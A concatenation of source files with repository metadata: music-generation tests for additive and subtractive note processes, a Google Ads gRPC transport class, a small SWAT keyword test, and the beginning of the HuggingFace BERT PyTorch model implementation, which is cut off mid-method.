C D E F G A B c d e
C D E F G A B c d e f
C D E F G A B c d e f g
"""
)
assert list(result.flat.notes) == list(intended_result.flat.notes)
def test_additive_process_iterations_end(example_stream):
result = minimalism.additive_process(example_stream, iterations_end=8)
intended_result = converter.parse(
"""tinyNotation:
C
C D
C D E
C D E F
C D E F G
C D E F G A
C D E F G A B
C D E F G A B c
"""
)
assert list(result.flat.notes) == list(intended_result.flat.notes)
def test_additive_process_nonlinear(example_stream):
result = minimalism.additive_process(
example_stream,
step_value=sequences.kolakoski(),
step_mode=minimalism.StepMode.ABSOLUTE,
iterations_end=8,
)
intended_result = converter.parse(
"""tinyNotation:
C
C D
C D
C
C
C D
C
C D
"""
)
assert list(result.flat.notes) == list(intended_result.flat.notes)
# Subtractive Process Tests
def test_subtractive_process(example_stream):
    """Default subtractive process: each iteration removes one more note
    from the start of the source stream."""
    result = minimalism.subtractive_process(example_stream)
    intended_result = converter.parse(
        """tinyNotation:
        C D E F G A B c d e f g
        D E F G A B c d e f g
        E F G A B c d e f g
        F G A B c d e f g
        G A B c d e f g
        A B c d e f g
        B c d e f g
        c d e f g
        d e f g
        e f g
        f g
        g
        """
    )
    # Compare the flattened note sequences; offsets/durations follow from parsing.
    assert list(result.flat.notes) == list(intended_result.flat.notes)
@pytest.mark.parametrize(
"direction,intended_result",
[
(
minimalism.Direction.BACKWARD,
converter.parse(
"""tinyNotation:
C D E F G A B c d e f g
C D E F G A B c d e f
C D E F G A B c d e
C D E F G A B c d
C D E F G A B c
C D E F G A B
C D E F G A
C D E F G
C D E F
C D E
C D
C
"""
),
),
(
minimalism.Direction.INWARD,
converter.parse(
"""tinyNotation:
C D E F G A B c d e f g
D E F G A B c d e f
E F G A B c d e
F G A B c d
G A B c
A B
"""
),
),
(
minimalism.Direction.OUTWARD,
converter.parse(
"""tinyNotation:
C D E F G A B c d e f g
C D E F G c d e f g
C D E F d e f g
C D E e f g
C D f g
C g
"""
),
),
],
)
def test_subtractive_process_direction(example_stream, direction, intended_result):
result = minimalism.subtractive_process(example_stream, direction=direction)
assert list(result.flat.notes) == list(intended_result.flat.notes)
def test_subtractive_process_step_value_int(example_stream):
result = minimalism.subtractive_process(example_stream, step_value=2)
intended_result = converter.parse(
"""tinyNotation:
C D E F G A B c d e f g
E F G A B c d e f g
G A B c d e f g
B c d e f g
d e f g
f g
"""
)
assert list(result.flat.notes) == list(intended_result.flat.notes)
def test_subtractive_process_step_value_sequence(example_stream):
result = minimalism.subtractive_process(example_stream, step_value=[1, 2, 3])
intended_result = converter.parse(
"""tinyNotation:
C D E F G A B c d e f g
D E F G A B c d e f g
F G A B c d e f g
B c d e f g
c d e f g
e f g
"""
)
assert list(result.flat.notes) == list(intended_result.flat.notes)
def test_subtractive_process_step_value_sequence_absolute(example_stream):
result = minimalism.subtractive_process(
example_stream,
step_value=sequences.PRIMES,
step_mode=minimalism.StepMode.ABSOLUTE,
)
intended_result = converter.parse(
"""tinyNotation:
C D E F G A B c d e f g
E F G A B c d e f g
F G A B c d e f g
A B c d e f g
c d e f g
g
"""
)
assert list(result.flat.notes) == list(intended_result.flat.notes)
def test_subtractive_process_step_value_sequence_absolute_infinite_loop(example_stream):
result = minimalism.subtractive_process(
example_stream, step_value=[1, 2, 3], step_mode=minimalism.StepMode.ABSOLUTE
)
intended_result = converter.parse(
"""tinyNotation:
C D E F G A B c d e f g
D E F G A B c d e f g
E F G A B c d e f g
F G A B c d e f g
"""
)
assert list(result.flat.notes) == list(intended_result.flat.notes)
def test_subtractive_process_repetitions_int(example_stream):
result = minimalism.subtractive_process(example_stream, repetitions=2)
intended_result = converter.parse(
"""tinyNotation:
C D E F G A B c d e f g
C D E F G A B c d e f g
D E F G A B c d e f g
D E F G A B c d e f g
E F G A B c d e f g
E F G A B c d e f g
F G A B c d e f g
F G A B c d e f g
G A B c d e f g
G A B c d e f g
A B c d e f g
A B c d e f g
B c d e f g
B c d e f g
c d e f g
c d e f g
d e f g
d e f g
e f g
e f g
f g
f g
g
g
"""
)
assert list(result.flat.notes) == list(intended_result.flat.notes)
def test_subtractive_process_repetitions_sequence(example_stream):
result = minimalism.subtractive_process(example_stream, repetitions=[1, 2, 3])
intended_result = converter.parse(
"""tinyNotation:
C D E F G A B c d e f g
D E F G A B c d e f g
D E F G A B c d e f g
E F G A B c d e f g
E F G A B c d e f g
E F G A B c d e f g
F G A B c d e f g
G A B c d e f g
G A B c d e f g
A B c d e f g
A B c d e f g
A B c d e f g
B c d e f g
c d e f g
c d e f g
d e f g
d e f g
d e f g
e f g
f g
f g
g
g
g
"""
)
assert list(result.flat.notes) == list(intended_result.flat.notes)
def test_subtractive_process_iterations_start(example_stream):
result = minimalism.subtractive_process(example_stream, iterations_start=3)
intended_result = converter.parse(
"""tinyNotation:
F G A B c d e f g
G A B c d e f g
A B c d e f g
B c d e f g
c d e f g
d e f g
e f g
f g
g
"""
)
assert list(result.flat.notes) == list(intended_result.flat.notes)
def test_subtractive_process_iterations_end(example_stream):
result = minimalism.subtractive_process(example_stream, iterations_end=8)
intended_result = converter.parse(
"""tinyNotation:
C D E F G A B c d e f g
D E F G A B c d e f g
E F G A B c d e f g
F G A B c d e f g
G A B c d e f g
A B c d e f g
B c d e f g
c d e f g
d e f g
"""
)
assert list(result.flat.notes) == list(intended_result.flat.notes)
def test_subtractive_process_nonlinear(example_stream):
result = minimalism.subtractive_process(
example_stream,
step_value=sequences.kolakoski(),
step_mode=minimalism.StepMode.ABSOLUTE,
iterations_end=8,
)
intended_result = converter.parse(
"""tinyNotation:
C D E F G A B c d e f g
D E F G A B c d e f g
E F G A B c d e f g
E F G A B c d e f g
D E F G A B c d e f g
D E F G A B c d e f g
E F G A B c d e f g
D E F G A B c d e f g
E F G A B c d e f g
"""
)
assert list(result.flat.notes) == list(intended_result.flat.notes)
| 25.93211 | 88 | 0.51355 |
795af7835d20a0e7ac3e72b1c399b52b9f7a1cf2 | 10,122 | py | Python | google/ads/googleads/v7/googleads-py/google/ads/googleads/v7/services/services/life_event_service/transports/grpc.py | googleapis/googleapis-gen | d84824c78563d59b0e58d5664bfaa430e9ad7e7a | [
"Apache-2.0"
] | 7 | 2021-02-21T10:39:41.000Z | 2021-12-07T07:31:28.000Z | google/ads/googleads/v7/googleads-py/google/ads/googleads/v7/services/services/life_event_service/transports/grpc.py | googleapis/googleapis-gen | d84824c78563d59b0e58d5664bfaa430e9ad7e7a | [
"Apache-2.0"
] | 6 | 2021-02-02T23:46:11.000Z | 2021-11-15T01:46:02.000Z | google/ads/googleads/v7/googleads-py/google/ads/googleads/v7/services/services/life_event_service/transports/grpc.py | googleapis/googleapis-gen | d84824c78563d59b0e58d5664bfaa430e9ad7e7a | [
"Apache-2.0"
] | 4 | 2021-01-28T23:25:45.000Z | 2021-08-30T01:55:16.000Z | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import warnings
from typing import Callable, Dict, Optional, Sequence, Tuple
from google.api_core import grpc_helpers # type: ignore
from google.api_core import gapic_v1 # type: ignore
import google.auth # type: ignore
from google.auth import credentials as ga_credentials # type: ignore
from google.auth.transport.grpc import SslCredentials # type: ignore
import grpc # type: ignore
from google.ads.googleads.v7.resources.types import life_event
from google.ads.googleads.v7.services.types import life_event_service
from .base import LifeEventServiceTransport, DEFAULT_CLIENT_INFO
class LifeEventServiceGrpcTransport(LifeEventServiceTransport):
"""gRPC backend transport for LifeEventService.
Service to fetch Google Ads Life Events.
This class defines the same methods as the primary client, so the
primary client can load the underlying transport implementation
and call it.
It sends protocol buffers over the wire using gRPC (which is built on
top of HTTP/2); the ``grpcio`` package must be installed.
"""
def __init__(self, *,
host: str = 'googleads.googleapis.com',
credentials: ga_credentials.Credentials = None,
credentials_file: str = None,
scopes: Sequence[str] = None,
channel: grpc.Channel = None,
api_mtls_endpoint: str = None,
client_cert_source: Callable[[], Tuple[bytes, bytes]] = None,
ssl_channel_credentials: grpc.ChannelCredentials = None,
quota_project_id: Optional[str] = None,
client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
) -> None:
"""Instantiate the transport.
Args:
host (Optional[str]):
The hostname to connect to.
credentials (Optional[google.auth.credentials.Credentials]): The
authorization credentials to attach to requests. These
credentials identify the application to the service; if none
are specified, the client will attempt to ascertain the
credentials from the environment.
This argument is ignored if ``channel`` is provided.
credentials_file (Optional[str]): A file with credentials that can
be loaded with :func:`google.auth.load_credentials_from_file`.
This argument is ignored if ``channel`` is provided.
scopes (Optional(Sequence[str])): A list of scopes. This argument is
ignored if ``channel`` is provided.
channel (Optional[grpc.Channel]): A ``Channel`` instance through
which to make calls.
api_mtls_endpoint (Optional[str]): Deprecated. The mutual TLS endpoint.
If provided, it overrides the ``host`` argument and tries to create
a mutual TLS channel with client SSL credentials from
``client_cert_source`` or application default SSL credentials.
client_cert_source (Optional[Callable[[], Tuple[bytes, bytes]]]):
Deprecated. A callback to provide client SSL certificate bytes and
private key bytes, both in PEM format. It is ignored if
``api_mtls_endpoint`` is None.
ssl_channel_credentials (grpc.ChannelCredentials): SSL credentials
for grpc channel. It is ignored if ``channel`` is provided.
quota_project_id (Optional[str]): An optional project to use for billing
and quota.
client_info (google.api_core.gapic_v1.client_info.ClientInfo):
The client info used to send a user-agent string along with
API requests. If ``None``, then default info will be used.
Generally, you only need to set this if you're developing
your own client library.
Raises:
google.auth.exceptions.MutualTLSChannelError: If mutual TLS transport
creation failed for any reason.
"""
self._ssl_channel_credentials = ssl_channel_credentials
if channel:
# Sanity check: Ensure that channel and credentials are not both
# provided.
credentials = False
# If a channel was explicitly provided, set it.
self._grpc_channel = channel
self._ssl_channel_credentials = None
elif api_mtls_endpoint:
warnings.warn("api_mtls_endpoint and client_cert_source are deprecated", DeprecationWarning)
host = api_mtls_endpoint if ":" in api_mtls_endpoint else api_mtls_endpoint + ":443"
if credentials is None:
credentials, _ = google.auth.default(scopes=self.AUTH_SCOPES, quota_project_id=quota_project_id)
# Create SSL credentials with client_cert_source or application
# default SSL credentials.
if client_cert_source:
cert, key = client_cert_source()
ssl_credentials = grpc.ssl_channel_credentials(
certificate_chain=cert, private_key=key
)
else:
ssl_credentials = SslCredentials().ssl_credentials
# create a new channel. The provided one is ignored.
self._grpc_channel = type(self).create_channel(
host,
credentials=credentials,
credentials_file=credentials_file,
ssl_credentials=ssl_credentials,
scopes=scopes or self.AUTH_SCOPES,
quota_project_id=quota_project_id,
options=[
("grpc.max_send_message_length", -1),
("grpc.max_receive_message_length", -1),
],
)
self._ssl_channel_credentials = ssl_credentials
else:
host = host if ":" in host else host + ":443"
if credentials is None:
credentials, _ = google.auth.default(scopes=self.AUTH_SCOPES)
# create a new channel. The provided one is ignored.
self._grpc_channel = type(self).create_channel(
host,
credentials=credentials,
ssl_credentials=ssl_channel_credentials,
scopes=self.AUTH_SCOPES,
options=[
("grpc.max_send_message_length", -1),
("grpc.max_receive_message_length", -1),
],
)
self._stubs = {} # type: Dict[str, Callable]
# Run the base constructor.
super().__init__(
host=host,
credentials=credentials,
client_info=client_info,
)
@classmethod
def create_channel(cls,
host: str = 'googleads.googleapis.com',
credentials: ga_credentials.Credentials = None,
scopes: Optional[Sequence[str]] = None,
**kwargs) -> grpc.Channel:
"""Create and return a gRPC channel object.
Args:
address (Optionsl[str]): The host for the channel to use.
credentials (Optional[~.Credentials]): The
authorization credentials to attach to requests. These
credentials identify this application to the service. If
none are specified, the client will attempt to ascertain
the credentials from the environment.
scopes (Optional[Sequence[str]]): A optional list of scopes needed for this
service. These are only used when credentials are not specified and
are passed to :func:`google.auth.default`.
kwargs (Optional[dict]): Keyword arguments, which are passed to the
channel creation.
Returns:
grpc.Channel: A gRPC channel object.
"""
return grpc_helpers.create_channel(
host,
credentials=credentials,
scopes=scopes or cls.AUTH_SCOPES,
**kwargs
)
def close(self):
self.grpc_channel.close()
@property
def grpc_channel(self) -> grpc.Channel:
"""Return the channel designed to connect to this service.
"""
return self._grpc_channel
@property
def get_life_event(self) -> Callable[
[life_event_service.GetLifeEventRequest],
life_event.LifeEvent]:
r"""Return a callable for the get life event method over gRPC.
Returns the requested life event in full detail.
Returns:
Callable[[~.GetLifeEventRequest],
~.LifeEvent]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if 'get_life_event' not in self._stubs:
self._stubs['get_life_event'] = self.grpc_channel.unary_unary(
'/google.ads.googleads.v7.services.LifeEventService/GetLifeEvent',
request_serializer=life_event_service.GetLifeEventRequest.serialize,
response_deserializer=life_event.LifeEvent.deserialize,
)
return self._stubs['get_life_event']
__all__ = (
'LifeEventServiceGrpcTransport',
)
| 43.44206 | 112 | 0.621814 |
795af80a5377c419f64b04f93bfab91e618a5afc | 1,177 | py | Python | swat/tests/test_keyword.py | bosout/python-swat | 36c1a1e301fb103ae90d11a373fb3f065be321fd | [
"Apache-2.0"
] | 133 | 2016-09-30T18:53:10.000Z | 2022-03-25T20:54:06.000Z | swat/tests/test_keyword.py | bosout/python-swat | 36c1a1e301fb103ae90d11a373fb3f065be321fd | [
"Apache-2.0"
] | 113 | 2017-01-16T21:01:23.000Z | 2022-03-29T11:02:21.000Z | swat/tests/test_keyword.py | bosout/python-swat | 36c1a1e301fb103ae90d11a373fb3f065be321fd | [
"Apache-2.0"
] | 65 | 2016-09-29T15:23:49.000Z | 2022-03-04T12:45:43.000Z | #!/usr/bin/env python
# encoding: utf-8
#
# Copyright SAS Institute
#
# Licensed under the Apache License, Version 2.0 (the License);
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import swat.utils.testing as tm
import unittest
from swat.utils.keyword import dekeywordify, keywordify
class TestKeyword(tm.TestCase):
    """Round-trip checks for the keyword (de)mangling helpers."""

    def test_dekeywordify(self):
        # Python reserved words gain a trailing underscore; non-keywords and
        # non-string values pass through unchanged.
        self.assertEqual(dekeywordify('from'), 'from_')
        self.assertEqual(dekeywordify('to'), 'to')
        self.assertEqual(dekeywordify(10), 10)

    def test_keywordify(self):
        # The trailing underscore is stripped back off mangled keywords.
        self.assertEqual(keywordify('from_'), 'from')
        self.assertEqual(keywordify('to'), 'to')
        self.assertEqual(keywordify(10), 10)
if __name__ == '__main__':
tm.runtests()
| 30.179487 | 75 | 0.715378 |
795af94a0a4d10357b715e149e9240a9898718c4 | 76,107 | py | Python | src/transformers/modeling_bert.py | h2rlet/transformers | 6f8a01a2ad709aca8e385108e7f946577c1df6bc | [
"Apache-2.0"
] | null | null | null | src/transformers/modeling_bert.py | h2rlet/transformers | 6f8a01a2ad709aca8e385108e7f946577c1df6bc | [
"Apache-2.0"
] | null | null | null | src/transformers/modeling_bert.py | h2rlet/transformers | 6f8a01a2ad709aca8e385108e7f946577c1df6bc | [
"Apache-2.0"
] | null | null | null | # coding=utf-8
# Copyright 2018 The Google AI Language Team Authors and The HuggingFace Inc. team.
# Copyright (c) 2018, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""PyTorch BERT model. """
import logging
import math
import os
import warnings
import torch
import torch.utils.checkpoint
from torch import nn
from torch.nn import CrossEntropyLoss, MSELoss
from .activations import gelu, gelu_new, swish
from .configuration_bert import BertConfig
from .file_utils import add_start_docstrings, add_start_docstrings_to_callable
from .modeling_utils import PreTrainedModel, find_pruneable_heads_and_indices, prune_linear_layer
logger = logging.getLogger(__name__)
BERT_PRETRAINED_MODEL_ARCHIVE_LIST = [
"bert-base-uncased",
"bert-large-uncased",
"bert-base-cased",
"bert-large-cased",
"bert-base-multilingual-uncased",
"bert-base-multilingual-cased",
"bert-base-chinese",
"bert-base-german-cased",
"bert-large-uncased-whole-word-masking",
"bert-large-cased-whole-word-masking",
"bert-large-uncased-whole-word-masking-finetuned-squad",
"bert-large-cased-whole-word-masking-finetuned-squad",
"bert-base-cased-finetuned-mrpc",
"bert-base-german-dbmdz-cased",
"bert-base-german-dbmdz-uncased",
"cl-tohoku/bert-base-japanese",
"cl-tohoku/bert-base-japanese-whole-word-masking",
"cl-tohoku/bert-base-japanese-char",
"cl-tohoku/bert-base-japanese-char-whole-word-masking",
"TurkuNLP/bert-base-finnish-cased-v1",
"TurkuNLP/bert-base-finnish-uncased-v1",
"wietsedv/bert-base-dutch-cased",
# See all BERT models at https://huggingface.co/models?filter=bert
]
def load_tf_weights_in_bert(model, config, tf_checkpoint_path):
    """ Load tf checkpoints in a pytorch model.

        Maps each variable name in the original TensorFlow BERT checkpoint at
        `tf_checkpoint_path` onto an attribute path of `model` and copies the
        weights over in place. Optimizer slot variables are skipped. Returns
        the same `model` instance. Requires TensorFlow and numpy at runtime.
    """
    try:
        import re
        import numpy as np
        import tensorflow as tf
    except ImportError:
        logger.error(
            "Loading a TensorFlow model in PyTorch, requires TensorFlow to be installed. Please see "
            "https://www.tensorflow.org/install/ for installation instructions."
        )
        raise
    tf_path = os.path.abspath(tf_checkpoint_path)
    logger.info("Converting TensorFlow checkpoint from {}".format(tf_path))
    # Load weights from TF model
    init_vars = tf.train.list_variables(tf_path)
    names = []
    arrays = []
    for name, shape in init_vars:
        logger.info("Loading TF weight {} with shape {}".format(name, shape))
        array = tf.train.load_variable(tf_path, name)
        names.append(name)
        arrays.append(array)
    for name, array in zip(names, arrays):
        # TF variable names are slash-separated scopes, e.g.
        # "bert/encoder/layer_0/attention/self/query/kernel".
        name = name.split("/")
        # adam_v and adam_m are variables used in AdamWeightDecayOptimizer to calculated m and v
        # which are not required for using pretrained model
        if any(
            n in ["adam_v", "adam_m", "AdamWeightDecayOptimizer", "AdamWeightDecayOptimizer_1", "global_step"]
            for n in name
        ):
            logger.info("Skipping {}".format("/".join(name)))
            continue
        # Walk down the module tree, one scope component at a time, until
        # `pointer` is the parameter matching this TF variable.
        pointer = model
        for m_name in name:
            if re.fullmatch(r"[A-Za-z]+_\d+", m_name):
                # e.g. "layer_11" -> attribute "layer" indexed at 11 below.
                scope_names = re.split(r"_(\d+)", m_name)
            else:
                scope_names = [m_name]
            if scope_names[0] == "kernel" or scope_names[0] == "gamma":
                pointer = getattr(pointer, "weight")
            elif scope_names[0] == "output_bias" or scope_names[0] == "beta":
                pointer = getattr(pointer, "bias")
            elif scope_names[0] == "output_weights":
                pointer = getattr(pointer, "weight")
            elif scope_names[0] == "squad":
                pointer = getattr(pointer, "classifier")
            else:
                try:
                    pointer = getattr(pointer, scope_names[0])
                except AttributeError:
                    # NOTE(review): this `continue` only skips the current
                    # scope component (inner loop), leaving `pointer` where it
                    # was — it does not skip the whole variable. This mirrors
                    # the upstream implementation; confirm before changing.
                    logger.info("Skipping {}".format("/".join(name)))
                    continue
            if len(scope_names) >= 2:
                num = int(scope_names[1])
                pointer = pointer[num]
        if m_name[-11:] == "_embeddings":
            # Embedding variables map to the .weight of an nn.Embedding.
            pointer = getattr(pointer, "weight")
        elif m_name == "kernel":
            # TF dense kernels are stored transposed relative to torch Linear.
            array = np.transpose(array)
        try:
            assert pointer.shape == array.shape
        except AssertionError as e:
            # Attach both shapes so the mismatch is visible in the traceback.
            e.args += (pointer.shape, array.shape)
            raise
        logger.info("Initialize PyTorch weight {}".format(name))
        pointer.data = torch.from_numpy(array)
    return model
def mish(x):
    """Mish activation: ``x * tanh(softplus(x))`` (Misra, 2019)."""
    gate = torch.tanh(nn.functional.softplus(x))
    return gate * x
# Map the activation names accepted in config.hidden_act to callables.
ACT2FN = {"gelu": gelu, "relu": torch.nn.functional.relu, "swish": swish, "gelu_new": gelu_new, "mish": mish}
# Alias for torch.nn.LayerNorm used throughout this file.
BertLayerNorm = torch.nn.LayerNorm
class BertEmbeddings(nn.Module):
    """Sum word, position and token-type embeddings, then LayerNorm + dropout."""

    def __init__(self, config):
        super().__init__()
        self.word_embeddings = nn.Embedding(config.vocab_size, config.hidden_size, padding_idx=config.pad_token_id)
        self.position_embeddings = nn.Embedding(config.max_position_embeddings, config.hidden_size)
        self.token_type_embeddings = nn.Embedding(config.type_vocab_size, config.hidden_size)
        # self.LayerNorm is not snake-cased to stick with TensorFlow model variable name and be able to load
        # any TensorFlow checkpoint file
        self.LayerNorm = BertLayerNorm(config.hidden_size, eps=config.layer_norm_eps)
        self.dropout = nn.Dropout(config.hidden_dropout_prob)

    def forward(self, input_ids=None, token_type_ids=None, position_ids=None, inputs_embeds=None):
        # Either token ids or precomputed embeddings must be provided; the
        # shape/device of whichever one is present drives the defaults below.
        if input_ids is None:
            input_shape = inputs_embeds.size()[:-1]
            device = inputs_embeds.device
        else:
            input_shape = input_ids.size()
            device = input_ids.device
        seq_length = input_shape[1]
        if position_ids is None:
            # Default positions are simply 0..seq_length-1 for every row.
            position_ids = torch.arange(seq_length, dtype=torch.long, device=device)
            position_ids = position_ids.unsqueeze(0).expand(input_shape)
        if token_type_ids is None:
            # All tokens default to segment 0.
            token_type_ids = torch.zeros(input_shape, dtype=torch.long, device=device)
        if inputs_embeds is None:
            inputs_embeds = self.word_embeddings(input_ids)
        summed = (
            inputs_embeds
            + self.position_embeddings(position_ids)
            + self.token_type_embeddings(token_type_ids)
        )
        return self.dropout(self.LayerNorm(summed))
class BertSelfAttention(nn.Module):
    """Multi-head scaled dot-product attention (self- or cross-attention)."""

    def __init__(self, config):
        super().__init__()
        if config.hidden_size % config.num_attention_heads != 0 and not hasattr(config, "embedding_size"):
            raise ValueError(
                "The hidden size (%d) is not a multiple of the number of attention "
                "heads (%d)" % (config.hidden_size, config.num_attention_heads)
            )
        self.num_attention_heads = config.num_attention_heads
        self.attention_head_size = int(config.hidden_size / config.num_attention_heads)
        self.all_head_size = self.num_attention_heads * self.attention_head_size
        # One projection per role; all map hidden_size -> all_head_size.
        self.query = nn.Linear(config.hidden_size, self.all_head_size)
        self.key = nn.Linear(config.hidden_size, self.all_head_size)
        self.value = nn.Linear(config.hidden_size, self.all_head_size)
        self.dropout = nn.Dropout(config.attention_probs_dropout_prob)

    def transpose_for_scores(self, x):
        """Reshape (..., all_head_size) into (batch, heads, seq, head_size)."""
        split_shape = x.size()[:-1] + (self.num_attention_heads, self.attention_head_size)
        return x.view(*split_shape).permute(0, 2, 1, 3)

    def forward(
        self,
        hidden_states,
        attention_mask=None,
        head_mask=None,
        encoder_hidden_states=None,
        encoder_attention_mask=None,
        output_attentions=False,
    ):
        # Queries always come from `hidden_states`. When used as a
        # cross-attention module, keys/values come from the encoder states and
        # the encoder's padding mask replaces the self-attention mask.
        if encoder_hidden_states is not None:
            kv_source = encoder_hidden_states
            attention_mask = encoder_attention_mask
        else:
            kv_source = hidden_states
        query_layer = self.transpose_for_scores(self.query(hidden_states))
        key_layer = self.transpose_for_scores(self.key(kv_source))
        value_layer = self.transpose_for_scores(self.value(kv_source))

        # Scaled dot-product scores between every query and key position.
        scores = torch.matmul(query_layer, key_layer.transpose(-1, -2))
        scores = scores / math.sqrt(self.attention_head_size)
        if attention_mask is not None:
            # Additive mask (large negatives on padded positions), precomputed
            # once per batch in BertModel.forward.
            scores = scores + attention_mask

        # Softmax over the key dimension, then token-level dropout — this
        # drops whole tokens to attend to, as in the original Transformer.
        attention_probs = self.dropout(nn.Softmax(dim=-1)(scores))
        if head_mask is not None:
            attention_probs = attention_probs * head_mask

        context = torch.matmul(attention_probs, value_layer)
        # Back to (batch, seq, all_head_size).
        context = context.permute(0, 2, 1, 3).contiguous()
        merged_shape = context.size()[:-2] + (self.all_head_size,)
        context = context.view(*merged_shape)

        if output_attentions:
            return (context, attention_probs)
        return (context,)
class BertSelfOutput(nn.Module):
    """Post-attention projection with dropout, residual add and LayerNorm."""

    def __init__(self, config):
        super().__init__()
        self.dense = nn.Linear(config.hidden_size, config.hidden_size)
        self.LayerNorm = BertLayerNorm(config.hidden_size, eps=config.layer_norm_eps)
        self.dropout = nn.Dropout(config.hidden_dropout_prob)

    def forward(self, hidden_states, input_tensor):
        projected = self.dropout(self.dense(hidden_states))
        # Residual connection around the attention sub-layer, then LayerNorm.
        return self.LayerNorm(projected + input_tensor)
class BertAttention(nn.Module):
    """Attention sub-layer: BertSelfAttention followed by the residual
    projection in BertSelfOutput, with support for head pruning."""

    def __init__(self, config):
        super().__init__()
        self.self = BertSelfAttention(config)
        self.output = BertSelfOutput(config)
        self.pruned_heads = set()

    def prune_heads(self, heads):
        """Remove the given attention heads from this layer, in place."""
        if not heads:
            return
        heads, index = find_pruneable_heads_and_indices(
            heads, self.self.num_attention_heads, self.self.attention_head_size, self.pruned_heads
        )
        # Shrink the q/k/v projections along their output rows, and the
        # output projection along its input columns.
        self.self.query = prune_linear_layer(self.self.query, index)
        self.self.key = prune_linear_layer(self.self.key, index)
        self.self.value = prune_linear_layer(self.self.value, index)
        self.output.dense = prune_linear_layer(self.output.dense, index, dim=1)
        # Book-keeping so repeated pruning accounts for already-removed heads.
        self.self.num_attention_heads -= len(heads)
        self.self.all_head_size = self.self.attention_head_size * self.self.num_attention_heads
        self.pruned_heads = self.pruned_heads.union(heads)

    def forward(
        self,
        hidden_states,
        attention_mask=None,
        head_mask=None,
        encoder_hidden_states=None,
        encoder_attention_mask=None,
        output_attentions=False,
    ):
        self_outputs = self.self(
            hidden_states, attention_mask, head_mask, encoder_hidden_states, encoder_attention_mask, output_attentions,
        )
        attention_output = self.output(self_outputs[0], hidden_states)
        # Keep any extra returns (attention probabilities) from self-attention.
        return (attention_output,) + self_outputs[1:]
class BertIntermediate(nn.Module):
    """Position-wise feed-forward expansion (hidden_size -> intermediate_size)."""

    def __init__(self, config):
        super().__init__()
        self.dense = nn.Linear(config.hidden_size, config.intermediate_size)
        # config.hidden_act may be a known activation name or a callable.
        if isinstance(config.hidden_act, str):
            self.intermediate_act_fn = ACT2FN[config.hidden_act]
        else:
            self.intermediate_act_fn = config.hidden_act

    def forward(self, hidden_states):
        return self.intermediate_act_fn(self.dense(hidden_states))
class BertOutput(nn.Module):
    """Project the feed-forward expansion back to hidden_size, then apply
    dropout, the residual connection and LayerNorm."""

    def __init__(self, config):
        super().__init__()
        self.dense = nn.Linear(config.intermediate_size, config.hidden_size)
        self.LayerNorm = BertLayerNorm(config.hidden_size, eps=config.layer_norm_eps)
        self.dropout = nn.Dropout(config.hidden_dropout_prob)

    def forward(self, hidden_states, input_tensor):
        projected = self.dropout(self.dense(hidden_states))
        return self.LayerNorm(projected + input_tensor)
class BertLayer(nn.Module):
    """One transformer block: (self-)attention, optional cross-attention in
    decoder mode, then the position-wise feed-forward sub-layer."""

    def __init__(self, config):
        super().__init__()
        self.attention = BertAttention(config)
        self.is_decoder = config.is_decoder
        if self.is_decoder:
            # Cross-attention over encoder states, only built in decoder mode.
            self.crossattention = BertAttention(config)
        self.intermediate = BertIntermediate(config)
        self.output = BertOutput(config)

    def forward(
        self,
        hidden_states,
        attention_mask=None,
        head_mask=None,
        encoder_hidden_states=None,
        encoder_attention_mask=None,
        output_attentions=False,
    ):
        attn_results = self.attention(
            hidden_states, attention_mask, head_mask, output_attentions=output_attentions,
        )
        attention_output = attn_results[0]
        extras = attn_results[1:]  # self-attention weights, when requested

        if self.is_decoder and encoder_hidden_states is not None:
            cross_results = self.crossattention(
                attention_output,
                attention_mask,
                head_mask,
                encoder_hidden_states,
                encoder_attention_mask,
                output_attentions,
            )
            attention_output = cross_results[0]
            extras = extras + cross_results[1:]  # cross-attention weights

        layer_output = self.output(self.intermediate(attention_output), attention_output)
        return (layer_output,) + extras
class BertEncoder(nn.Module):
    """Stack of ``config.num_hidden_layers`` BertLayer modules."""
    def __init__(self, config):
        super().__init__()
        self.config = config
        self.layer = nn.ModuleList([BertLayer(config) for _ in range(config.num_hidden_layers)])
    def forward(
        self,
        hidden_states,
        attention_mask=None,
        head_mask=None,
        encoder_hidden_states=None,
        encoder_attention_mask=None,
        output_attentions=False,
        output_hidden_states=False,
    ):
        # Accumulated only when the corresponding output_* flag is set.
        all_hidden_states = ()
        all_attentions = ()
        for i, layer_module in enumerate(self.layer):
            if output_hidden_states:
                # Records the INPUT to each layer; the final layer's output is
                # appended after the loop.
                all_hidden_states = all_hidden_states + (hidden_states,)
            if getattr(self.config, "gradient_checkpointing", False):
                # Trade compute for memory: recompute this layer's forward in
                # the backward pass. `output_attentions` is captured via the
                # closure because torch.utils.checkpoint only forwards
                # positional (tensor) arguments.
                def create_custom_forward(module):
                    def custom_forward(*inputs):
                        return module(*inputs, output_attentions)
                    return custom_forward
                layer_outputs = torch.utils.checkpoint.checkpoint(
                    create_custom_forward(layer_module),
                    hidden_states,
                    attention_mask,
                    head_mask[i],
                    encoder_hidden_states,
                    encoder_attention_mask,
                )
            else:
                layer_outputs = layer_module(
                    hidden_states,
                    attention_mask,
                    head_mask[i],
                    encoder_hidden_states,
                    encoder_attention_mask,
                    output_attentions,
                )
